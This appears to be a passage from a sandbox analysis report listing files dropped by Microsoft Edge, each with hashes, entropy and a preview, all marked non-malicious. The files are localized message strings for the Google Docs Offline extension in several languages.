                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3107
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                        MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                        SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                        SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                        SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1389
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                        MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                        SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                        SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                        SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1763
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                        MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                        SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                        SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                        SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):930
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                        MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                        SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                        SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                        SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):913
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                        MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                        SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                        SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                        SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):806
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                        MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                        SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                        SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                        SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):883
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                        MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                        SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                        SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                        SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1031
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                        MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                        SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                        SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                        SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1613
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                        MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                        SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                        SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                        SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):848
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                        MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                        SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                        SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                        SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1425
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                        MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                        SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                        SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                        SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):961
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):959
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
